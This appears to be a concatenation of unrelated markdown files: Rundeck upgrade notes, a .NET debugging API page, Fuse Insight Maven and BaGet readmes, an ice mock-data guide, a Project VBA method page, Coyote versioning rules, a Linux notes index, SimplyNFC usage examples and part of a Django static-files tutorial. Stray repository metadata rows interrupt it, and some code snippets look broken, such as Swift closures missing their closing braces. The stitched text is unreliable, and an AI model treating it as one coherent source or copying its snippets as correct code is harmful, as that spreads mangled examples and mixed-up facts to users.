The default jaas-loginmodule.conf file included with Rundeck 1.6.x uses the `org.mortbay.jetty.plus.jaas.spi.PropertyFileLoginModule` class. You will have to change your file to specify `org.eclipse.jetty.plus.jaas.spi.PropertyFileLoginModule` ("org.eclipse").
Modify the `$RDECK_BASE/server/config/jaas-loginmodule.conf` (launcher install) or `/etc/rundeck/jaas-loginmodule.conf` (RPM/Deb install).
## Upgrading an existing H2 Database
If you want to migrate your existing H2 Database, you will have to download an additional jar file to enable upgrading to the newer H2 version used in Rundeck 2.0.
Download the `h2mig_pagestore_addon.jar` file linked on this page:
* [H2 Database Upgrade](http://www.h2database.com/html/advanced.html#database_upgrade)
* Direct link: <http://h2database.com/h2mig_pagestore_addon.jar>
Copy the file to `$RDECK_BASE/server/lib` (launcher jar) or `/var/lib/rundeck/bootstrap` (RPM/Deb install).
## Upgrading an existing Mysql or other Database
Rundeck 2.0 will add some columns to the existing tables, but should allow in-place migration of the mysql database.
However, make sure you take appropriate backups of your data prior to upgrading.
---
description: 'Learn more about: ICorDebugProcess6::GetExportStepInfo Method'
title: ICorDebugProcess6::GetExportStepInfo Method
ms.date: 03/30/2017
ms.assetid: a927e0ac-f110-426d-bbec-9377a29c8f17
ms.openlocfilehash: e14b5e66d90fb2ece91991b3634fc2ad86fac895
ms.sourcegitcommit: ddf7edb67715a5b9a45e3dd44536dabc153c1de0
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 02/06/2021
ms.locfileid: "99722015"
---
# <a name="icordebugprocess6getexportstepinfo-method"></a>ICorDebugProcess6::GetExportStepInfo Method
Provides information about runtime-exported functions to help step through managed code.
## <a name="syntax"></a>Syntax
```cpp
HRESULT GetExportStepInfo(
    [in] LPCWSTR pszExportName,
    [out] CorDebugCodeInvokeKind* pInvokeKind,
    [out] CorDebugCodeInvokePurpose* pInvokePurpose);
```
## <a name="parameters"></a>Parameters
`pszExportName`
[in] The name of a runtime export function, as written in the PE export table.
`pInvokeKind`
[out] A pointer to a member of the [CorDebugCodeInvokeKind](cordebugcodeinvokekind-enumeration.md) enumeration that describes how the exported function will invoke managed code.
`pInvokePurpose`
[out] A pointer to a member of the [CorDebugCodeInvokePurpose](cordebugcodeinvokepurpose-enumeration.md) enumeration that describes why the exported function will call managed code.
## <a name="return-value"></a>Return Value
The method can return the values listed in the following table.
|Return value|Description|
|------------------|-----------------|
|`S_OK`|The method call succeeded.|
|`E_POINTER`|`pInvokeKind` or `pInvokePurpose` is **null**.|
|Other failing `HRESULT` values.|As appropriate.|
## <a name="remarks"></a>Remarks
> [!NOTE]
> This method is only available with .NET Native.
## <a name="requirements"></a>Requirements
**Platforms:** See [System Requirements](../../get-started/system-requirements.md).
**Header:** CorDebug.idl, CorDebug.h
**Library:** CorGuids.lib
**.NET Framework Versions:**[!INCLUDE[net_46_native](../../../../includes/net-46-native-md.md)]
## <a name="see-also"></a>See also
- [ICorDebugProcess6 Interface](icordebugprocess6-interface.md)
- [Debugging Interfaces](debugging-interfaces.md)
Fuse Insight Maven
==================
This project aims to give you insight into your dependencies along with differences between versions.
Start by seeing the version dependencies, dependency deltas between product releases
and even generating Legal reports.
To run, type:
    cd insight-maven-web
    mvn jetty:run
then open: http://localhost:8080/insight/projects
Note that the example projects are really just URLs; you can make up your own URI of the form
* http://localhost:8080/insight/projects/project/GROUPID/ARTIFACTID/jar//VERSION
for product information, or for a comparison of 2 versions...
* http://localhost:8080/insight/projects/compare/GROUPID/ARTIFACTID/jar//VERSION1/VERSION2
Note that the /jar// part is really /EXTENSION/CLASSIFIER/. Typically the EXTENSION is "jar" and CLASSIFIER is "" | 33.958333 | 113 | 0.774233 | eng_Latn | 0.980911 |
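For example, with a made-up group and artifact (`org.apache.camel/camel-core` is purely illustrative), the two patterns expand to:

```shell
# Expand the two URI templates; note the empty CLASSIFIER between "jar//".
base=http://localhost:8080/insight/projects
echo "$base/project/org.apache.camel/camel-core/jar//2.10.0"
echo "$base/compare/org.apache.camel/camel-core/jar//2.9.0/2.10.0"
```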
61d54b598116fb53896ab28be0ce9423eb0aea8c | 1,772 | md | Markdown | docs/guide/advance/mock.md | nieyao/ice | 1b6d90321bb06709ca288a73bd06d6347bf83269 | [
"MIT"
] | 1 | 2021-09-11T04:34:11.000Z | 2021-09-11T04:34:11.000Z | docs/guide/advance/mock.md | sspku-yqLiu/ice | e1701e68a959612ab505fef939cf9ad317ba2059 | [
"MIT"
] | null | null | null | docs/guide/advance/mock.md | sspku-yqLiu/ice | e1701e68a959612ab505fef939cf9ad317ba2059 | [
"MIT"
] | null | null | null | ---
title: 本地 Mock 数据
order: 11
---
在前后端分离的开发中,Mock 数据是前端开发中很重要的一个环节,前端可以不必强依赖后端接口,只需要约定好对应的数据接口,前端可以通过 Mock 模拟数据先行开发,在后端接口开发完成后,只需要切换对应的接口地址即可,可以保证项目的同步开发。
在飞冰中,我们提供了完整的 Mock 方案,支持 CRUD 等操作,只需要在项目目录下新建 mock 文件夹,并配置入口文件 `index.ts` 作为路由表的入口,在启动项目服务时工具会同步的启动 Mock 服务。
## 编写 mock 接口
在项目根目录下新建 `mock/index.ts` 文件,并写入以下示例代码:
```ts
export default {
// 同时支持 GET 和 POST
'/api/users/1': { data: {} },
'/api/foo/bar': { data: {} },
// 支持标准 HTTP
'GET /api/users': { users: [1, 2] },
'DELETE /api/users': { users: [1, 2] },
// 支持参数
'POST /api/users/:id': (req, res) => {
const { id } = req.params;
res.send({ id: id });
},
};
```
启动调试服务后,假设启动的端口是 3333,直接在浏览器里访问 `http://127.0.0.1:3333/api/users` 即可看到接口返回数据。
## 约定规则
默认约定项目 mock 目录下每一个 `(t|j)s` 文件为 mock 服务文件,即需要使用上述规范返回数据接口。
如果存在 mock 服务通用工具脚本和数据脚本,可以将对应的文件存放在 `mock/excludeMock` 目录下,该目录下默认不走 mock 逻辑。
忽略 mock 的文件,可以通过工程配置进行自定义:
```json
{
"mock": {
"exclude": ["**/custom/**", "**/*.ts"]
}
}
```
> 上述规则代表忽略 mock 目录中所有 `custom` 目录下的文件以及所有 ts 类型文件
## 请求数据
```jsx
import { useRequest } from 'ice';
function ListView(props) {
const { data, loading, error, request } = useRequest({
url: '/api/users/1',
method: 'GET',
});
useEffect(() => {
request();
}, []);
console.log(data);
return (
<>
// jsx
</>
);
}
```
## 使用 Mock.js
[Mock.js](https://github.com/nuysoft/Mock) 是一个随机生成 mock 数据的工具库:
```ts
import * as Mock from 'mockjs';
export default {
'GET /api/list': (req, res) => {
const list = Mock.mock({
'list|1-10': [
{
'id|+1': 1,
},
],
});
res.send({
status: 'SUCCESS',
data: {
list,
}
});
},
};
```
完整的语法情参考 [Mock.js 文档](http://mockjs.com/examples.html) 。
| 17.203883 | 120 | 0.575621 | yue_Hant | 0.859598 |
61d55a74e9d248691dc96a4e60e10fb35aaae0f1 | 1,244 | md | Markdown | api/Project.application.removetimelinebar.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-04-08T20:10:22.000Z | 2021-04-08T20:10:22.000Z | api/Project.application.removetimelinebar.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-04-02T13:17:46.000Z | 2019-04-02T13:17:46.000Z | api/Project.application.removetimelinebar.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-09-28T07:45:29.000Z | 2021-09-28T07:45:29.000Z | ---
title: Application.RemoveTimelineBar Method (Project)
keywords: vbapj.chm158
f1_keywords:
- vbapj.chm158
ms.assetid: 8385d889-b81e-5422-a032-c7073fa7c65d
ms.date: 06/08/2017
ms.prod: project-server
localization_priority: Normal
---
# Application.RemoveTimelineBar Method (Project)
Removes a **Timeline** bar from the view. Introduced in Office 2016.
## Syntax
_expression_. `RemoveTimelineBar` _(BarIndex) _
_expression_ A variable that represents a [Application](./Project.Application.md) object.
## Parameters
|Name|Required/Optional|Data type|Description|
|:-----|:-----|:-----|:-----|
| _BarPosition_|Optional|**Integer**|Indicates the timeline bar to remove. If a number isn't specified, the selected bar is removed if applicable. The top bar is 0 and the next is 1, and so on. If a number is not specified, the selected bar is removed if one is selected. The last timeline bar cannot be removed.|
| _TimelineViewName_|Optional|**String**|Specifies the name of a timeline. The name can be the built-in timeline or an existing custom timeline such as "My Timeline". The default value is the name of the active timeline.|
## Return value
**BOOLEAN**
[!include[Support and feedback](~/includes/feedback-boilerplate.md)] | 32.736842 | 313 | 0.752412 | eng_Latn | 0.948273 |
61d60867c10c8a8905affe626f6a3f32dc437259 | 2,820 | md | Markdown | Versioning.md | gitter-badger/coyote-1 | d5695ea9ae221804cc3243507a045cb8803dabc6 | [
"MIT"
] | null | null | null | Versioning.md | gitter-badger/coyote-1 | d5695ea9ae221804cc3243507a045cb8803dabc6 | [
"MIT"
] | null | null | null | Versioning.md | gitter-badger/coyote-1 | d5695ea9ae221804cc3243507a045cb8803dabc6 | [
"MIT"
] | null | null | null | # Guidance on Coyote versioning
#### v1.0.0
The Coyote framework versioning follows [Semantic Versioning 2.0.0](https://semver.org/) and has the pattern of MAJOR.MINOR.PATCH.
1) MAJOR version when you make incompatible API changes,
2) MINOR version when you add functionality in a backwards compatible manner, and
3) PATCH version when you make backwards compatible bug fixes.
We adopt everything listed in [Semantic Versioning 2.0.0](https://semver.org/)
but to summarize the major points here:
**Incrementing the MAJOR version number** should be done when:
* a major new feature is added to the Coyote framework or tools and is showcased by a new tutorial demonstrating this feature
* a breaking change has been made to Coyote API or serialization format, or
tool command line arguments.
**Incrementing the MINOR version number** should be done when:
* new features are added to the Coyote API or tools that are backwards
compatible
**Incrementing the PATCH version number** should be done when
* anything else changes in the the Coyote framework.
Not all changes to the repository warrant a version change. For example,
* test code changes
* documentation only fixing typos and grammar
* automation script updates
* reformatting of code for styling changes
## Process
Developers maintain `History.md` with each checkin, adding bullet points to the
top version number listed with an asterix. For example, it might look like this:
```
## v2.4.5*
- Fix some concurrency bugs in the framis checker.
```
The asterix means this version has not yet reached the master branch on github. Each developer
modifies this the new version number in `History.md` according to the above rules. For example, one
developer might fix a bug and bump the **patch** version number from "v2.4.5*" to "v2.4.6*". Another
might then add a big new feature that warrants a major version change, so they will change the
top record in `History.md` from "v2.4.6*" to "v3.0.0*". All other changes made from there will leave
the number at "v3.0.0" until these bits are pushed to the master branch in github.
When all this is pushed to github in a Pull Request, `Common\version.props` and
`Scripts\NuGet\Coyote.nuspec` are updated with the new version number listed in `History.md` and the
asterix is removed, indicating this version number is now locked. The next person to change the repo will then start a new version number record in `History.md` and add the asterix to indicate to everyone else
that this new number is not yet locked.
The contents in `History.md` is then copied to the github release page, which makes it easy to do
a release. There is no need to go searching through the change log to come up with the right
release summary. Code reviews are used to ensure folks remember to update this `History.md` file. | 51.272727 | 209 | 0.775177 | eng_Latn | 0.999172 |
61d6a7f43780bfdc7fcf88d4f6089295d217befa | 6,996 | md | Markdown | README.md | cxfans/linux-notes | 6e53c5d082d061581bac40d09826ba48bc24f4e0 | [
"MIT"
] | null | null | null | README.md | cxfans/linux-notes | 6e53c5d082d061581bac40d09826ba48bc24f4e0 | [
"MIT"
] | null | null | null | README.md | cxfans/linux-notes | 6e53c5d082d061581bac40d09826ba48bc24f4e0 | [
"MIT"
] | 1 | 2020-07-11T08:52:27.000Z | 2020-07-11T08:52:27.000Z | ---
date: 2022-03-19T18:47:48+08:00 # 创建日期
author: "Rustle Karl" # 作者
# 文章
title: "Linux 学习笔记" # 文章标题
description: "纸上得来终觉浅,学到过知识点分分钟忘得一干二净,今后无论学什么,都做好笔记吧。"
url: "posts/linux/README" # 设置网页永久链接
tags: [ "Linux", "README" ] # 标签
series: [ "Linux 学习笔记" ] # 系列
categories: [ "学习笔记" ] # 分类
index: true # 是否可以被索引
toc: true # 是否自动生成目录
draft: false # 草稿
---
# Linux 学习笔记
> 纸上得来终觉浅,学到过知识点分分钟忘得一干二净,今后无论学什么,都做好笔记吧。
## 目录结构
- `assets/images`: 笔记配图
- `assets/templates`: 笔记模板
- `docs`: 基础语法
- `tools`: 常用工具
- `tools/standard`: 标准常用工具
- `tools/tripartite`: 第三方常用工具
- `quickstart`: 基础用法
- `src`: 源码示例
- `src/docs`: 基础语法源码示例
## 基础知识
- [Linux 的启动过程](docs/base/boot.md)
- [Shell 脚本基础语法](docs/base/shell_script.md)
- [pipeline 管道符与输入输出](docs/base/pipeline.md)
- [Linux 串口与 USB 转串口问题](docs/base/serial_port.md)
- [Linux 防火墙配置 iptables 和 firewalld](docs/base/firewall.md)
- [Linux 存储结构与磁盘划分](docs/base/storage.md)
- [Linux 用户与权限](docs/base/user.md)
## 基础用法
- [Linux CPU 性能测试](quickstart/bench.md)
### 安装配置
```
cinst rufus
```
- [Ubuntu 系统重装后的基本配置](quickstart/install/ubuntu_desktop.md)
- [Ubuntu 安装 Nvidai 显卡驱动](quickstart/install/ubuntu_desktop_nvidia.md)
- [OpenSSH 教程](quickstart/openssh.md)
- [Fish Shell 安装与主题切换](quickstart/shell/fish.md)
- [Ubuntu WSL 问题笔记](quickstart/install/ubuntu_wsl.md)
- [Kali Linux WSL 问题笔记](quickstart/install/kali_wsl.md)
- [MacOS 基本配置](quickstart/install/macos.md)
- [VMware 安装 MacOS](quickstart/install/macos_vmware.md)
## 常用工具
### 包管理器
- [apk Alpine Linux 下的包管理工具](tools/pkg-manager/apk.md)
- [apt-get Debian Linux 发行版中的 APT 软件包管理工具](tools/pkg-manager/apt-get.md)
- [apt-key 管理 Debian Linux 系统中的软件包密钥](tools/pkg-manager/apt-key.md)
- [brew MacOS 包管理器](tools/pkg-manager/brew.md)
- [dnf 新一代的 RPM 软件包管理器](tools/pkg-manager/dnf.md)
- [dpkg Debian Linux 系统上安装、创建和管理软件包](tools/pkg-manager/dpkg.md)
- [opkg OpenWrt 包管理器](tools/pkg-manager/opkg.md)
- [yum 基于 RPM 的软件包管理器](tools/pkg-manager/yum.md)
### 系统自带工具
- [alias 设置别名](tools/standard/alias.md)
- [at 设置一次性定时执行任务](tools/standard/at.md)
- [awk 文本处理](tools/standard/awk.md)
- [chattr 设置文件的隐藏权限](tools/standard/chattr.md)
- [unalias 取消别名](tools/standard/unalias.md)
- [cat 打印到标准输出](tools/standard/cat.md)
- [cd 改变当前工作目录](tools/standard/cd.md)
- [chmod 设置文件或目录的权限](tools/standard/chmod.md)
- [chown 设置文件或目录的所有者和所属组](tools/standard/chown.md)
- [chsh 更改登录 Shell](tools/standard/chsh.md)
- [cp 复制](tools/standard/cp.md)
- [crontab 设置长期性计划任务](tools/standard/crontab.md)
- [ctrlaltdel 设置组合键 `Ctrl+Alt+Del` 的功能](tools/standard/ctrlaltdel.md)
- [cut 按列提取文本字符](tools/standard/cut.md)
- [date 打印或者设置系统日期和时间](tools/standard/date.md)
- [dd 复制文件或转换文件](tools/standard/dd.md)
- [df 显示文件系统的信息](tools/standard/df.md)
- [diff 按行比较多个文本文件的内容差异](tools/standard/diff.md)
- [disown 从作业中移除](tools/standard/disown.md)
- [du 查看磁盘使用情况](tools/standard/du.md)
- [e2fsck 检查文件系统的完整性](tools/standard/e2fsck.md)
- [echo 在标准输出回显字符串](tools/standard/echo.md)
- [edquota 编辑用户的 quota 配额限制](tools/standard/edquota.md)
- [export 在当前会话修改环境变量](tools/standard/export.md)
- [fdisk 管理硬盘设备](tools/standard/fdisk.md)
- [file 确定文件类型](tools/standard/file.md)
- [find 按照指定条件查找文件](tools/standard/find.md)
- [getfacl 显示文件上设置的 ACL 信息](tools/standard/getfacl.md)
- [groupadd 创建新的用户组](tools/standard/groupadd.md)
- [halt 中断系统](tools/standard/halt.md)
- [head 打印文件前几行](tools/standard/head.md)
- [history 显示、管理以前执行过的命令](tools/standard/history.md)
- [free 查询内存资源信息](tools/standard/free.md)
- [grep 搜索匹配关键词](tools/standard/grep.md)
- [ifconfig 获取网卡配置与网络状态等信息](tools/standard/ifconfig.md)
- [id 显示指定用户的相关信息](tools/standard/id.md)
- [kill 终止进程](tools/standard/kill.md)
- [killall 终止指定名称的全部进程](tools/standard/killall.md)
- [ln 创建链接文件](tools/standard/ln.md)
- [last 显示用户的登录日志](tools/standard/last.md)
- [lsblk 列出块设备信息](tools/standard/lsblk.md)
- [lsattr 显示文件的隐藏权限](tools/standard/lsattr.md)
- [ls 列出目录下文件的权限和属性信息](tools/standard/ls.md)
- [lsof 列出当前系统打开的文件](tools/standard/lsof.md)
- [blkid 查看块设备的文件系统类型](tools/standard/blkid.md)
- [mount 挂载文件系统](tools/standard/mount.md)
- [mkdir 创建目录](tools/standard/mkdir.md)
- [mkfs 格式化硬盘,创建文件系统](tools/standard/mkfs.md)
- [mv 移动,重命名](tools/standard/mv.md)
- [nohup 以忽略挂起信号的方式运行程序](tools/standard/nohup.md)
- [passwd 修改用户名密码](tools/standard/passwd.md)
- [pidof 打印指定进程名称的全部 PID 值](tools/standard/pidof.md)
- [poweroff 关闭操作系统,切断系统电源](tools/standard/poweroff.md)
- [ps 显示系统进程状态](tools/standard/ps.md)
- [pwd 输出当前工作目录](tools/standard/pwd.md)
- [reboot 重启系统](tools/standard/reboot.md)
- [rm 移除项目](tools/standard/rm.md)
- [scp 在网络之间进行安全传输数据](tools/standard/scp.md)
- [screen 命令行终端切换](tools/standard/screen.md)
- [setsid 让进程在新的会话中运行](tools/standard/setsid.md)
- [shutdown 关闭操作系统](tools/standard/shutdown.md)
- [source 在当前终端执行来自一个文件的命令](tools/standard/source.md)
- [sudo 给普通用户提供额外的权限](tools/standard/sudo.md)
- [tail 打印文件最后几行](tools/standard/tail.md)
- [tmux 运行多个终端会话](tools/standard/tmux.md)
- [top 进程活动监视](tools/standard/top.md)
- [touch 创建空白文件](tools/standard/touch.md)
- [umount 卸载文件系统](tools/standard/umount.md)
- [userdel 删除用户](tools/standard/userdel.md)
- [su 切换用户](tools/standard/su.md)
- [stat 查询文件、文件系统状态信息](tools/standard/stat.md)
- [sed 文本编辑](tools/standard/sed.md)
- [read 从标准输入读取一行,依次赋值](tools/standard/read.md)
- [swapon 挂载 swap 分区](tools/standard/swapon.md)
- [setfacl 管理文件的 ACL 规则](tools/standard/setfacl.md)
- [partprobe 通知操作系统分区表的更改](tools/standard/partprobe.md)
- [tr 字符替换](tools/standard/tr.md)
- [tar 对文件进行打包压缩或解压](tools/standard/tar.md)
- [pvcreate 初始化供 LVM 使用的物理卷](tools/standard/pvcreate.md)
- [useradd 创建新的用户](tools/standard/useradd.md)
- [uptime 查询系统负载信息](tools/standard/uptime.md)
- [uname 获取当前系统信息](tools/standard/uname.md)
- [usermod 修改用户的属性](tools/standard/usermod.md)
- [wget 非交互式网络下载器](tools/standard/wget.md)
- [wc 统计指定文本的行数、单词数、字符数、字节数等](tools/standard/wc.md)
- [whereis 定位文件位置](tools/standard/whereis.md)
- [which 定位可执行命令的位置](tools/standard/which.md)
- [who 显示当前用户名及其启动的终端信息](tools/standard/who.md)
### 第三方工具
- [ab 服务器性能测试工具](tools/tripartite/ab.md)
- [hdparm 显示与设定硬盘的参数](tools/tripartite/hdparm.md)
- [iotop 监视磁盘I/O使用状况的工具](tools/tripartite/iotop.md)
- [iostat 监视系统输入输出设备和 CPU 的使用情况](tools/tripartite/iostat.md)
- [rsync 同步文件](tools/tripartite/rsync.md)
- [vim 文本编辑器](tools/tripartite/vim.md)
- [htop 动态观察系统进程状况](tools/tripartite/htop.md)
- [root 用户启动 google chrome](tools/tripartite-gui/google-chrome.md)
- [proxychains 与 graftcp 原理对比](tools/tripartite-gui/proxychains_graftcp.md)
## Linux网络编程
- [第1章_Linux操作系统概述](docs/Linux网络编程/第1章_Linux操作系统概述.md)
- [第2章_Linux编程环境](docs/Linux网络编程/第2章_Linux编程环境.md)
- [第3章_文件系统简介](docs/Linux网络编程/第3章_文件系统简介.md)
- [第4章_程序、进程和线程](docs/Linux网络编程/第4章_程序、进程和线程.md)
- [第5章_TCP_IP协议族简介](docs/Linux网络编程/第5章_TCP_IP协议族简介.md)
- [第7章_TCP网络编程基础](docs/Linux网络编程/第7章_TCP网络编程基础.md)
- [第8章_服务器和客户端信息的获取](docs/Linux网络编程/第8章_服务器和客户端信息的获取.md)
- [第9章_数据的IO和复用](docs/Linux网络编程/第9章_数据的IO和复用.md)
- [第10章_基于UDP协议的接收和发送](docs/Linux网络编程/第10章_基于UDP协议的接收和发送.md)
- [第11章_高级套接字](docs/Linux网络编程/第11章_高级套接字.md)
- [第15章_IPv6简介](docs/Linux网络编程/第15章_IPv6简介.md)
## 问题
- [ssh 问题](issues/ssh.md)
[source: README.md | yanngodeau/SimplyNFC | MIT]

# SimplyNFC
Simply read and write NFC tags with iPhone (iOS 14.0+)
[](https://github.com/yanngodeau/SimplyNFC/blob/main/LICENSE)
[](https://github.com/yanngodeau/SimplyNFC)
[](https://swift.org)
## Installation
### Swift package manager
Go to `File | Swift Packages | Add Package Dependency...` in Xcode and search for « SimplyNFC »
### Carthage
You can use [Carthage](https://github.com/Carthage/Carthage) to install `SimplyNFC` by adding it to your `Cartfile`.
```swift
github "yanngodeau/SimplyNFC"
```
### Manual
1. Put SimplyNFC repo somewhere in your project directory.
2. In Xcode, add `SimplyNFC.xcodeproj` to your project
3. On your app's target, add the SimplyNFC framework:
1. as an embedded binary on the General tab.
2. as a target dependency on the Build Phases tab.
## Usage
### Read tag
Reading an `NFCNDEFMessage` from a tag
```swift
import SimplyNFC
let nfcManager = NFCManager()
nfcManager.read { manager in
// Session did become active
manager.setMessage("👀 Place iPhone near the tag to read")
} didDetect: { manager, result in
switch result {
case .failure:
manager.setMessage("👎 Failed to read tag")
case .success:
manager.setMessage("🙌 Tag read successfully")
    }
}
```
### Write on tag
Writing an `NFCNDEFMessage` to a tag
```swift
import SimplyNFC
let nfcManager = NFCManager()
// ndefMessage is an NFCNDEFMessage you have built beforehand
nfcManager.write(message: ndefMessage) { manager in
// Session did become active
manager.setMessage("👀 Place iPhone near the tag to be written on")
} didDetect: { manager, result in
switch result {
case .failure:
manager.setMessage("👎 Failed to write tag")
case .success:
manager.setMessage("🙌 Tag successfully written")
    }
}
```
## Contribute
- Fork it!
- Create your feature branch: `git checkout -b my-new-feature`
- Commit your changes: `git commit -am 'Add some feature'`
- Push to the branch: `git push origin my-new-feature`
- Submit a pull request
## License
SimplyNFC is distributed under the [MIT License](https://mit-license.org).
## Author
- Yann Godeau - [@yanngodeau](https://github.com/yanngodeau)
Based on code by [@tattn](https://github.com/tattn)
[source: content/labs/lab02.md | Democratising-Forecasting/advanced-forecasting | CC0-1.0]

---
output:
  md_document:
    preserve_yaml: true
    variant: gfm
layout: page
title: Lab 02
---
[source: readme.md | schizoid90/BaGet | MIT]

# BaGet :baguette_bread:
[](https://sharml.visualstudio.com/BaGet/_build/latest?definitionId=2) [](https://gitter.im/BaGetServer/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
A lightweight [NuGet](https://docs.microsoft.com/en-us/nuget/what-is-nuget) and [Symbol](https://docs.microsoft.com/en-us/windows/desktop/debug/symbol-servers-and-symbol-stores) server.
<p align="center">
<img width="100%" src="https://user-images.githubusercontent.com/737941/50140219-d8409700-0258-11e9-94c9-dad24d2b48bb.png">
</p>
## Getting Started
1. Install [.NET Core SDK](https://www.microsoft.com/net/download)
2. Download and extract [BaGet's latest release](https://github.com/loic-sharma/BaGet/releases)
3. Start the service with `dotnet BaGet.dll`
4. Browse `http://localhost:5000/` in your browser
For more information, please refer to [our documentation](https://loic-sharma.github.io/BaGet/).
## Features
* Cross-platform
* [Dockerized](https://loic-sharma.github.io/BaGet/#running-baget-on-docker)
* [Cloud ready](https://loic-sharma.github.io/BaGet/cloud/azure/)
* [Supports read-through caching](https://loic-sharma.github.io/BaGet/configuration/#enabling-read-through-caching)
* Can index the entirety of nuget.org. See [this documentation](https://loic-sharma.github.io/BaGet/tools/mirroring/)
* Coming soon: Supports [private feeds](https://loic-sharma.github.io/BaGet/private-feeds/)
* And more!
Stay tuned, more features are planned!
## Develop
1. Install [.NET Core SDK](https://www.microsoft.com/net/download) and [Node.js](https://nodejs.org/)
2. Run `git clone https://github.com/loic-sharma/BaGet.git`
3. Navigate to `.\BaGet\src\BaGet.UI`
4. Install the frontend's dependencies with `npm install`
5. Navigate to `..\BaGet`
6. Start the service with `dotnet run`
7. Open the URL `http://localhost:5000/v3/index.json` in your browser
## Helm
### Package/Install
* Clone the repo, then run `helm package`:
```
helm package baget
```
You can then push that chart to any helm repository you want and install from there
```
helm install -g myrepo/baget
```
* Or install directly from the chart directory without packaging:
```
helm install -g baget
```
Modify the installation by either editing the `values.yaml` file or passing the parameters you want to change with `--set`:
```
helm install -g baget --set fullname=nuget,persistence.enabled=true,persistence.storageClass=someclass
```
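The same overrides can equivalently live in a custom values file passed with `-f`. The file name and values below are just an example; the keys mirror the dotted `--set` paths from the configuration table:

```yaml
# my-values.yaml (hypothetical example)
fullname: nuget
persistence:
  enabled: true
  storageClass: someclass
```

Install it with `helm install -g baget -f my-values.yaml`.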
### Configure
| Parameter | Description | Default |
|-------------------------------|---------------------------------------------------------|-----------------------------------|
| `fullname` | Name of the deployment | `baget` |
| `gracePeriod` | terminationGracePeriodSeconds setting | `10` |
| `image` | Name of the image to deploy | `loicsharma/baget` |
| `imageVersion` | Version of the image to deploy | `latest` |
| `namespaceOverride` | Override context namespace | `` |
| `replicas` | Number of pods to deploy | `1` |
| `env.apiKey` | API key users will use to auth | `` |
| `env.storageType` | Type of storage to be used | `FileSystem` |
| `env.storagePath` | Path to use for storage | `/var/baget/packages` |
| `env.databaseType` | Type of database | `Sqlite` |
| `env.databaseConnectionString`| Connection string for db | `Data Source=/var/baget/baget.db` |
| `env.searchType` | Type of search to carry out | `Database` |
| `ingress.enabled` | Enable and create an ingress | `false` |
| `ingress.hosts` | External DNS of the app | `name: "", tls: false, secret: ""`|
| `persistence.acceesMode` | Storage access mode | `ReadWriteOnce` |
| `persistence.enabled` | Enable and use persistent storage | `false` |
| `persistence.path` | Path to mount pvc | `/var/baget` |
| `persistence.size` | Size of the pvc | `10G` |
| `persistence.storageClass` | Storage class for pvc | `` |
| `persistence.volumeName` | Name of existing pv | `` |
| `resources.requests` | Compute resource requests | `mem: 100Mi, cpu: 100m` |
| `resources.limits` | Compute resource limits | `mem: 250Mi, cpu: 200m` |
| `service.enabled` | Enable and create service | `true` |
| `service.NodePort` | Specify Node port (relies on `service.type: NodePort`) | `` |
| `service.serviceName` | Name of the service | `{{ .Values.fullname }}-svc` |
| `service.type` | Type of service to create | `ClusterIP` |
[source: docs/python/learn-django-in-visual-studio-step-03-serve-static-files-and-add-pages.md | prasanthlouis/visualstudio-docs | CC-BY-4.0, MIT]

---
title: Learn Django tutorial in Visual Studio step 3, static files and pages
titleSuffix: ""
description: A walkthrough of Django basics in the context of Visual Studio projects, specifically demonstrating how to serve static files, add pages to the app, and use template inheritance
ms.date: 11/19/2018
ms.prod: visual-studio-dev15
ms.topic: tutorial
author: kraigb
ms.author: kraigb
manager: jillfra
ms.custom: seodec18
ms.workload:
- python
- data-science
---
# Step 3: Serve static files, add pages, and use template inheritance
**Previous step: [Create a Django app with views and page templates](learn-django-in-visual-studio-step-02-create-an-app.md)**
In the previous steps of this tutorial, you've learned how to create a minimal Django app with a single page of self-contained HTML. Modern web apps, however, are typically composed of many pages, and make use of shared resources like CSS and JavaScript files to provide consistent styling and behavior.
In this step, you learn how to:
> [!div class="checklist"]
> - Use Visual Studio item templates to quickly add new files of different types with convenient boilerplate code (step 3-1)
> - Configure the Django project to serve static files (step 3-2)
> - Add additional pages to the app (step 3-3)
> - Use template inheritance to create a header and nav bar that's used across pages (step 3-4)
## Step 3-1: Become familiar with item templates
As you develop a Django app, you typically add many more Python, HTML, CSS, and JavaScript files. For each file type (as well as other files like *web.config* that you may need for deployment), Visual Studio provides convenient [item templates](python-item-templates.md) to get you started.
To see available templates, go to **Solution Explorer**, right-click the folder in which you want to create the item, select **Add** > **New Item**:

To use a template, select the desired template, specify a name for the file, and select **OK**. Adding an item in this manner automatically adds the file to your Visual Studio project and marks the changes for source control.
### Question: How does Visual Studio know which item templates to offer?
Answer: The Visual Studio project file (*.pyproj*) contains a project type identifier that marks it as a Python project. Visual Studio uses this type identifier to show only those item templates that are suitable for the project type. This way, Visual Studio can supply a rich set of item templates for many project types without asking you to sort through them every time.
## Step 3-2: Serve static files from your app
In a web app built with Python (using any framework), your Python files always run on the web host's server and are never transmitted to a user's computer. Other files, however, such as CSS and JavaScript, are used exclusively by the browser, so the host server simply delivers them as-is whenever they're requested. Such files are referred to as "static" files, and Django can deliver them automatically without you needing to write any code.
A Django project is configured by default to serve static files from the app's *static* folder, thanks to these lines in the Django project's *settings.py*:
```python
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = posixpath.join(*(BASE_DIR.split(os.path.sep) + ['static']))
```
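To see what that `STATIC_ROOT` expression evaluates to, you can run it in plain Python outside Django. The `BASE_DIR` value below is a made-up example, not one taken from this project:

```python
import os
import posixpath

# Hypothetical project root; in settings.py Django computes BASE_DIR for you.
BASE_DIR = os.path.sep.join(["home", "user", "HelloDjangoApp"])

# The same expression as in settings.py: split BASE_DIR into its path
# segments, append 'static', and rejoin with forward slashes.
STATIC_ROOT = posixpath.join(*(BASE_DIR.split(os.path.sep) + ['static']))

print(STATIC_ROOT)  # home/user/HelloDjangoApp/static
```

The result is always a forward-slash path, which is why the settings template uses `posixpath` rather than `os.path` for the join.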
